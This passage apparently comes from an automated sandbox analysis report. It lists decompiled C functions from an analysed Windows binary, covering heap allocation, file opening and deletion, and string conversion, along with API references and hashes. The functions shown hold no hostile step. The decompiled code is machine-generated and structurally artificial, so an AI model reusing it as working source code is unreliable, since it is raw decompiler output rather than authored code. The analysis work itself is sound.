                                        			E0040B3E0(void* __ebp, void* _a4) {
				void* _t12;
				long _t15;
				long _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t24;

				_t18 = _a4;
				_t19 = 0;
				_t20 = E0040DAB8( *0x418784, _t18);
				if(_t20 == 0) {
					return 0;
				} else {
					_t12 = CreateFileW( *(_t24 + 0x30), 0x80000000, 0, 0, 3, 0x80, 0); // executed
					_t22 = _t12;
					if(_t22 == 0xffffffff || _t22 == 0) {
						L9:
						if(_t18 != 0xffffffff) {
							_t20 = _t18;
						}
						E0040DA2A( *0x418784, _t20);
					} else {
						_t15 =  *0x417120; // 0x1000
						if(_t15 == 0) {
							 *(_t20 + 4) = 0;
						} else {
							_t17 = RtlAllocateHeap( *0x418068, 0, _t15); // executed
							 *(_t20 + 4) = _t17;
						}
						 *_t20 = _t22;
						_t16 =  *0x417120; // 0x1000
						 *(_t20 + 0xc) = _t19;
						_t19 = _t20;
						 *(_t20 + 8) = _t16;
						 *((intOrPtr*)(_t20 + 0x14)) = 1;
						 *((intOrPtr*)(_t20 + 0x18)) = 2;
						 *((intOrPtr*)(_t20 + 0x1c)) = 1;
						if(_t18 != 0xffffffff) {
							_t19 = _t22;
						}
						if(_t19 == 0) {
							goto L9;
						}
					}
					return _t19;
				}
			}












                                        0x0040b3e1
                                        0x0040b3ee
                                        0x0040b3f5
                                        0x0040b3f9
                                        0x0040b493
                                        0x0040b3ff
                                        0x0040b413
                                        0x0040b419
                                        0x0040b41e
                                        0x0040b472
                                        0x0040b475
                                        0x0040b477
                                        0x0040b477
                                        0x0040b480
                                        0x0040b424
                                        0x0040b424
                                        0x0040b42b
                                        0x0040b440
                                        0x0040b42d
                                        0x0040b435
                                        0x0040b43b
                                        0x0040b43b
                                        0x0040b443
                                        0x0040b445
                                        0x0040b44a
                                        0x0040b44d
                                        0x0040b44f
                                        0x0040b452
                                        0x0040b459
                                        0x0040b460
                                        0x0040b46a
                                        0x0040b46c
                                        0x0040b46c
                                        0x0040b470
                                        0x00000000
                                        0x00000000
                                        0x0040b470
                                        0x0040b48b
                                        0x0040b48b

                                        APIs
                                          • Part of subcall function 0040DAB8: RtlEnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B3F5,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DAC3
                                          • Part of subcall function 0040DAB8: RtlLeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B3F5,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB3E
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000), ref: 0040B413
                                        • RtlAllocateHeap.NTDLL(00000000,00001000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B435
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CriticalSection$AllocateCreateEnterFileHeapLeave
                                        • String ID:
                                        • API String ID: 2608263337-0
                                        • Opcode ID: 9f5ee579fc23ee4392a60a7205fce73a6785e91ff6aefb26c97f3f6454093326
                                        • Instruction ID: 5ea2fc4be7d3e309b73522e881238f0346768eddaf714dbde48763640e321e69
                                        • Opcode Fuzzy Hash: 9f5ee579fc23ee4392a60a7205fce73a6785e91ff6aefb26c97f3f6454093326
                                        • Instruction Fuzzy Hash: 0D11D371240304ABC2304F1ADC44F57BBE9EB85764F10823EF594A33E1C7759919CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E206, Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040E206(signed int _a4, intOrPtr _a8, intOrPtr _a20) {
				void* _v0;
				intOrPtr _v4;
				void* _v8;
				void* _v12;
				void* _t19;
				long _t29;
				void* _t31;
				signed int _t33;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t36 = _a20;
				_t34 = 0;
				E0040E359(_v0);
				_t33 = _a4;
				if(_t33 > 0) {
					_t29 = _a4 * _t33 + 0x18;
					_t19 = RtlAllocateHeap( *0x418068, 0, _t29); // executed
					_t34 = _t19;
					if(_t34 != 0) {
						 *((intOrPtr*)(_t34 + 4)) = _v4;
						 *((intOrPtr*)(_t34 + 8)) = _a8;
						_t9 = _t29 - 0x18; // 0xffffffc5
						 *(_t34 + 0x10) = _t33;
						 *(_t34 + 0x14) = _a4;
						 *((intOrPtr*)(_t34 + 0xc)) = _t36;
						 *_t34 = 1;
						_t34 = _t34 + 0x18;
						 *(_t38 + 0x30) = _t34;
						memset(_t34, 0, _t9);
						_t39 = _t38 + 0xc;
						_v0 = _t34;
						_t37 = _a8;
						if(E00411DE4(_a8) != 0 && _t33 > 0) {
							_t31 = _t34;
							_t35 = _v4;
							do {
								E0041220F(_t31, _t37);
								_t31 = _t31 + _t35;
								_t33 = _t33 - 1;
							} while (_t33 != 0);
							_t34 =  *(_t39 + 0x24);
						}
					}
				}
				return _t34;
			}
















                                        0x0040e207
                                        0x0040e20d
                                        0x0040e212
                                        0x0040e217
                                        0x0040e21d
                                        0x0040e22b
                                        0x0040e236
                                        0x0040e23c
                                        0x0040e240
                                        0x0040e24a
                                        0x0040e251
                                        0x0040e254
                                        0x0040e258
                                        0x0040e25b
                                        0x0040e25e
                                        0x0040e261
                                        0x0040e267
                                        0x0040e26d
                                        0x0040e271
                                        0x0040e276
                                        0x0040e279
                                        0x0040e27c
                                        0x0040e288
                                        0x0040e28e
                                        0x0040e290
                                        0x0040e294
                                        0x0040e296
                                        0x0040e29b
                                        0x0040e29d
                                        0x0040e29d
                                        0x0040e2a0
                                        0x0040e2a0
                                        0x0040e288
                                        0x0040e2a4
                                        0x0040e2aa

                                        APIs
                                          • Part of subcall function 0040E359: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040E217,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417070,004180F0,00000004), ref: 0040E39A
                                        • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417070,004180F0,00000004,00000000,00417060), ref: 0040E236
                                        • memset.MSVCRT ref: 0040E271
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Heap$AllocateFreememset
                                        • String ID:
                                        • API String ID: 2774703448-0
                                        • Opcode ID: 82d2160707bf0cb483c706f7fca5efa44a6664b36908d1399f7bd7b7e60fb7af
                                        • Instruction ID: 73bead70dc036c61bbca0d606ee27ac3de542931ca62ebae370a8e76c28ea50b
                                        • Opcode Fuzzy Hash: 82d2160707bf0cb483c706f7fca5efa44a6664b36908d1399f7bd7b7e60fb7af
                                        • Instruction Fuzzy Hash: 67117C725043159BC320DF4AE940A4BBBE8EF98710F05492EF998A7351D778EC108BA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E8A0, Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040E8A0(signed int _a4, void* _a8) {
				void** _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				long _t32;
				void* _t44;
				void* _t45;

				_t32 =  *0x417168; // 0x1b
				_v8 = TlsGetValue(_t32);
				if(_a8 == 0xffffffff) {
					_a8 = _v8[2];
				}
				_v12 = _v8[2] + _a4 * 2;
				if(_v12 >= _v8[1] - 4) {
					_v8[1] = _v12 + 0x4000;
					_t44 =  *0x418788; // 0x22f0000
					_t45 = RtlReAllocateHeap(_t44, 0,  *_v8, _v8[1] + 0xa); // executed
					 *_v8 = _t45;
				}
				_v16 =  *_v8 + _a8;
				_v8[2] = _a8 + _a4 * 2;
				return _v16;
			}









                                        0x0040e8a6
                                        0x0040e8b2
                                        0x0040e8b9
                                        0x0040e8c1
                                        0x0040e8c1
                                        0x0040e8d0
                                        0x0040e8df
                                        0x0040e8ec
                                        0x0040e901
                                        0x0040e907
                                        0x0040e910
                                        0x0040e910
                                        0x0040e91a
                                        0x0040e929
                                        0x0040e932

                                        APIs
                                        • TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E8AC
                                        • RtlReAllocateHeap.NTDLL(022F0000,00000000,?,?), ref: 0040E907
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AllocateHeapValue
                                        • String ID:
                                        • API String ID: 3894635346-0
                                        • Opcode ID: cbad60d1342e0e670ea03c3cedb42d7581b430e1ef84ff177422b9e9c75bf026
                                        • Instruction ID: 09594cff8746446ca2263681faa5216b891ae7c48e74fec7e0aaaa06b27af351
                                        • Opcode Fuzzy Hash: cbad60d1342e0e670ea03c3cedb42d7581b430e1ef84ff177422b9e9c75bf026
                                        • Instruction Fuzzy Hash: D821A474A00108EFCB00DF98D59499DB7B5FF88314B20C1A9E9199B391D731AE52DF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040AFF0, Relevance: 3.0, APIs: 2, Instructions: 31memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E0040AFF0(intOrPtr _a4) {
				void** _t4;
				intOrPtr _t9;
				void** _t11;

				_t9 = _a4;
				if(_t9 != 0xffffffff) {
					_push(_t9);
					_t4 = E0040DA79( *0x418784);
					_t11 = _t4;
					if(_t11 != 0) {
						if(_t11[1] != 0) {
							E0040B060(_t11);
							HeapFree( *0x418068, 0, _t11[1]);
						}
						FindCloseChangeNotification( *_t11); // executed
						_t4 = E0040DA2A( *0x418784, _t9);
					}
					return _t4;
				} else {
					return E0040E015( *0x418784);
				}
			}






                                        0x0040aff1
                                        0x0040aff8
                                        0x0040b00a
                                        0x0040b011
                                        0x0040b016
                                        0x0040b01a
                                        0x0040b020
                                        0x0040b023
                                        0x0040b033
                                        0x0040b033
                                        0x0040b03b
                                        0x0040b048
                                        0x0040b048
                                        0x0040b04f
                                        0x0040affa
                                        0x0040b006
                                        0x0040b006

                                        APIs
                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040B033
                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B03B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ChangeCloseFindFreeHeapNotification
                                        • String ID:
                                        • API String ID: 1642550653-0
                                        • Opcode ID: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                                        • Instruction ID: 82f63e5163772f8c1a8c8fdcfe23af9941d65339ec18b4f6804dde31591f8968
                                        • Opcode Fuzzy Hash: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                                        • Instruction Fuzzy Hash: 59F08232104510ABC6312B5AEC09E8B7A76EB91764F14853FF124350F4CB754850DB9C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E720, Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0040E720(void* __ecx, void** _a4, wchar_t* _a8) {
				int _v8;
				void* _t11;
				void* _t14;
				void* _t15;

				_push(__ecx);
				if(_a8 != 0) {
					_v8 = wcslen(_a8);
					_t14 =  *0x418788; // 0x22f0000
					_t15 = RtlAllocateHeap(_t14, 0, _v8 + _v8 + 0xa); // executed
					 *_a4 = _t15;
					return E0040E9A0(_a4,  *_a4, _a8, _v8);
				}
				return _t11;
			}







                                        0x0040e723
                                        0x0040e728
                                        0x0040e736
                                        0x0040e743
                                        0x0040e749
                                        0x0040e752
                                        0x00000000
                                        0x0040e762
                                        0x0040e76a

                                        APIs
                                        • wcslen.MSVCRT ref: 0040E72E
                                        • RtlAllocateHeap.NTDLL(022F0000,00000000,?,?,00000000,00000000), ref: 0040E749
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AllocateHeapwcslen
                                        • String ID:
                                        • API String ID: 1345907364-0
                                        • Opcode ID: b38a5250acca0660470545ad843db1fdc04a06f7122efcfdd985ab4c8f936cd3
                                        • Instruction ID: 5dd3166bf760cdb588e0f9f9dd0ea5df0103e5f3a3a94cd469ea72e8eb1ef895
                                        • Opcode Fuzzy Hash: b38a5250acca0660470545ad843db1fdc04a06f7122efcfdd985ab4c8f936cd3
                                        • Instruction Fuzzy Hash: F2F05EB5600208FFCB04DFA5D840E9A73B9EF88718F10C46DF9088B390D635EA01CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E470, Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040E470() {
				void* _t1;
				void* _t4;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x418788 = _t1;
				 *0x417168 = TlsAlloc();
				return E0040ECA0(_t4);
			}





                                        0x0040e47c
                                        0x0040e482
                                        0x0040e48d
                                        0x0040e498

                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E47C
                                        • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E487
                                          • Part of subcall function 0040ECA0: RtlAllocateHeap.KERNEL32(022F0000,00000000,0000000C,?,?,0040E497,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ECAE
                                          • Part of subcall function 0040ECA0: RtlAllocateHeap.KERNEL32(022F0000,00000000,00000010,?,?,0040E497,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ECC2
                                          • Part of subcall function 0040ECA0: TlsSetValue.KERNEL32(0000001B,00000000,?,?,0040E497,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ECEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Heap$Allocate$AllocCreateValue
                                        • String ID:
                                        • API String ID: 3361498153-0
                                        • Opcode ID: 8d1d57f4c04581ebd6fe23d81bbf1bed904b3a1f2628c82e0c9bfecc77735000
                                        • Instruction ID: 8e499edd0da04b2f057a8b9ab42a1f67ed3e3ee19fafc243016919ab3dd3e982
                                        • Opcode Fuzzy Hash: 8d1d57f4c04581ebd6fe23d81bbf1bed904b3a1f2628c82e0c9bfecc77735000
                                        • Instruction Fuzzy Hash: 6CD012705C83046BE7002BB2BC4A7843A789704755F20843AF909573D0DAB95480895C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040ADD9, Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040ADD9(WCHAR* _a4, signed char _a8) {
				int _t8;

				if(_a4 == 0) {
					return 0;
				}
				if((_a8 & 0x00000002) != 0) {
					SetFileAttributesW(_a4, 0x80);
				}
				_t8 = DeleteFileW(_a4); // executed
				return _t8;
			}




                                        0x0040adde
                                        0x00000000
                                        0x0040ae02
                                        0x0040ade5
                                        0x0040adf0
                                        0x0040adf0
                                        0x0040adfa
                                        0x00000000

                                        APIs
                                        • SetFileAttributesW.KERNEL32(00000002,00000080,0040AE12,022F97F8,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040ADF0
                                        • DeleteFileW.KERNELBASE(00000000,0040AE12,022F97F8,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040ADFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: File$AttributesDelete
                                        • String ID:
                                        • API String ID: 2910425767-0
                                        • Opcode ID: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                                        • Instruction ID: 5a999076a505254474357f4f7f9d9763132b1ae2598985e03b3e911eccb14a63
                                        • Opcode Fuzzy Hash: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                                        • Instruction Fuzzy Hash: 0CD06730048341ABD7555B10C90DB5B7AA2AF90745F04C869B685618F1CB788CA4EA4A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A2D0, Relevance: 2.6, APIs: 2, Instructions: 113COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040A2D0() {
				short* _t24;
				signed int _t25;
				char _t26;
				signed int _t31;
				char _t32;
				signed int _t36;
				char* _t38;
				signed int _t41;
				int _t42;
				signed char _t45;
				char* _t46;
				short* _t47;
				char* _t48;
				void* _t49;
				char* _t50;
				signed int _t51;
				signed int* _t52;
				int _t54;
				char* _t56;
				void* _t57;

				_t45 =  *(_t57 + 0xc);
				_t41 = _t45 & 0x0000001f;
				_t36 = (0 |  *(_t57 + 0xc) - 0xffffffff < 0x00000000) - 0x00000001 &  *(_t57 + 0x10);
				if(_t41 != 0x19) {
					_t50 =  *(_t57 + 0x10);
					if(_t41 != 2) {
						_t42 = 0;
						 *(_t57 + 0x1c) = 0;
						goto L16;
					} else {
						_t42 = 0xfde9;
						 *(_t57 + 0x1c) = 0xfde9;
						if(_t36 == 0xffffffff) {
							L17:
							_t56 = _t50;
							_t15 =  &(_t56[1]); // 0x1
							_t46 = _t15;
							do {
								_t26 =  *_t56;
								_t56 =  &(_t56[1]);
							} while (_t26 != 0);
							_t54 = _t56 - _t46;
						} else {
							if((_t45 & 0x00000040) == 0) {
								_t36 = E0040EA20(_t50, _t36);
								_t42 = 0xfde9;
							}
							L16:
							if(_t36 != 0xffffffff) {
								_t54 = 0;
								if( *_t50 != 0) {
									while(_t54 < _t36) {
										_t54 = _t54 + 1;
										if(_t50[_t54] != 0) {
											continue;
										}
										goto L23;
									}
								}
							} else {
								goto L17;
							}
						}
					}
					L23:
					_t51 = MultiByteToWideChar(_t42, 0, _t50, _t54, 0, 0);
					_t24 = E0040E8A0(_t51,  *(_t57 + 0x20));
					_t18 = _t51 + 1; // 0x1
					_t47 = _t24;
					_t25 = MultiByteToWideChar( *(_t57 + 0x30), 0,  *(_t57 + 0x20), _t54, _t47, _t18);
					_t47[_t25] = 0;
					return _t25;
				} else {
					_t48 =  *(_t57 + 0x10);
					if(_t36 == 0xffffffff) {
						_t38 = _t48;
						_t7 =  &(_t38[2]); // 0x2
						_t41 = _t7;
						do {
							_t32 =  *_t38;
							_t38 =  &(_t38[2]);
						} while (_t32 != 0);
						_t36 = _t38 - _t41 >> 1;
					}
					_t52 = E0040E8A0(_t36,  *(_t57 + 0x1c));
					if(_t48 != 0 && _t36 != 0) {
						_t49 = _t48 - _t52;
						while(1) {
							_t31 =  *(_t49 + _t52) & 0x0000ffff;
							if(_t31 == 0) {
								goto L10;
							}
							 *_t52 = _t31;
							_t52 =  &(_t52[0]);
							_t36 = _t36 - 1;
							if(_t36 != 0) {
								continue;
							}
							goto L10;
						}
					}
					L10:
					E0040E9F0(_t41, _t36);
					 *_t52 = 0;
					return 0;
				}
			}























                                        0x0040a2d0
                                        0x0040a2d9
                                        0x0040a2e6
                                        0x0040a2ee
                                        0x0040a348
                                        0x0040a350
                                        0x0040a375
                                        0x0040a377
                                        0x00000000
                                        0x0040a352
                                        0x0040a352
                                        0x0040a357
                                        0x0040a35e
                                        0x0040a380
                                        0x0040a380
                                        0x0040a382
                                        0x0040a382
                                        0x0040a385
                                        0x0040a385
                                        0x0040a388
                                        0x0040a389
                                        0x0040a38d
                                        0x0040a360
                                        0x0040a363
                                        0x0040a36c
                                        0x0040a36e
                                        0x0040a36e
                                        0x0040a37b
                                        0x0040a37e
                                        0x0040a391
                                        0x0040a396
                                        0x0040a398
                                        0x0040a39c
                                        0x0040a3a1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040a3a1
                                        0x0040a398
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040a37e
                                        0x0040a35e
                                        0x0040a3a3
                                        0x0040a3b8
                                        0x0040a3bb
                                        0x0040a3c0
                                        0x0040a3c3
                                        0x0040a3d2
                                        0x0040a3d7
                                        0x0040a3de
                                        0x0040a2f0
                                        0x0040a2f0
                                        0x0040a2f7
                                        0x0040a2f9
                                        0x0040a2fb
                                        0x0040a2fb
                                        0x0040a300
                                        0x0040a300
                                        0x0040a303
                                        0x0040a306
                                        0x0040a30d
                                        0x0040a30d
                                        0x0040a319
                                        0x0040a31d
                                        0x0040a323
                                        0x0040a325
                                        0x0040a325
                                        0x0040a32c
                                        0x00000000
                                        0x00000000
                                        0x0040a32e
                                        0x0040a331
                                        0x0040a334
                                        0x0040a335
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040a335
                                        0x0040a325
                                        0x0040a337
                                        0x0040a338
                                        0x0040a340
                                        0x0040a345
                                        0x0040a345

                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00403F00,00000001,00000002,00000000,00000000,00000000), ref: 0040A3B2
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,?,?,00000000,00403F00,00000001,00000002,00000000), ref: 0040A3D2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 626452242-0
                                        • Opcode ID: ba134f20c8d8bc566073bd04fea1739eee31e28d57e35d10c361ee1cf07495d2
                                        • Instruction ID: f96920ca9665de0da0b601de0b8aea32a002411d1ea323e8acd75fa6936af5ca
                                        • Opcode Fuzzy Hash: ba134f20c8d8bc566073bd04fea1739eee31e28d57e35d10c361ee1cf07495d2
                                        • Instruction Fuzzy Hash: D63103361083016BD7349E798C80B7FB399EF91364F144A3FFEA1262C1D63D9821976A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402BA6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 67%
                                        			E00402BA6(void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v8;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				intOrPtr _v36;
				void* _t17;
				void* _t23;
				void* _t25;
				void* _t26;
				void* _t27;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t35;
				void* _t36;
				intOrPtr* _t37;

				_push(0);
				_push(0);
				_push(0);
				E004051A0(E0040E600(), _a8);
				_t31 = _v0;
				E00405060(_t37, _t31);
				_v16 = E0040A1C0(0x2710);
				GetShortPathNameW(_v20, _v16, 0x2710); // executed
				_t17 = E0040E4C0();
				_t32 = _t31;
				_push(_t17);
				E0040A230(_v16, 0xffffffff, E0040E4C0());
				E0040E500( &_v24, _t32);
				E0040A1A0(_v36);
				_push(_v36);
				_t23 = E0040E4C0();
				_pop(_t35);
				E0040E660(_t35);
				_t25 = _t23;
				_t26 = E00405170();
				_t36 = _t25;
				_t27 = _t26 + _t36;
				return E0040E590(E0040E590(_t27,  *_t37), _v8);
			}



















                                        0x00402ba8
                                        0x00402ba9
                                        0x00402baa
                                        0x00402bb4
                                        0x00402bb9
                                        0x00402bc0
                                        0x00402bcf
                                        0x00402be0
                                        0x00402be6
                                        0x00402beb
                                        0x00402bec
                                        0x00402bfe
                                        0x00402c08
                                        0x00402c11
                                        0x00402c1a
                                        0x00402c1b
                                        0x00402c20
                                        0x00402c23
                                        0x00402c28
                                        0x00402c2a
                                        0x00402c2f
                                        0x00402c30
                                        0x00402c52

                                        APIs
                                          • Part of subcall function 0040E600: TlsGetValue.KERNEL32(0000001B,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417060), ref: 0040E617
                                          • Part of subcall function 0040A1C0: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A1D1
                                        • GetShortPathNameW.KERNEL32 ref: 00402BE0
                                          • Part of subcall function 0040E4C0: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E4C6
                                          • Part of subcall function 0040E4C0: TlsGetValue.KERNEL32(0000001B), ref: 0040E4D5
                                          • Part of subcall function 0040E4C0: SetLastError.KERNEL32(?), ref: 0040E4EB
                                          • Part of subcall function 0040E500: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040E50C
                                          • Part of subcall function 0040E500: RtlAllocateHeap.NTDLL(022F0000,00000000,?), ref: 0040E539
                                          • Part of subcall function 0040A1A0: RtlFreeHeap.NTDLL(00000000,00000000,00401B7C,00000000,00000000,?,00000000,00000000,00417020,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0040A1AC
                                          • Part of subcall function 0040E660: wcslen.MSVCRT ref: 0040E677
                                          • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                          • Part of subcall function 0040E590: HeapFree.KERNEL32(022F0000,00000000,00000000,?,00000000,?,00412164,00000000,00000000,-00000008), ref: 0040E5A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
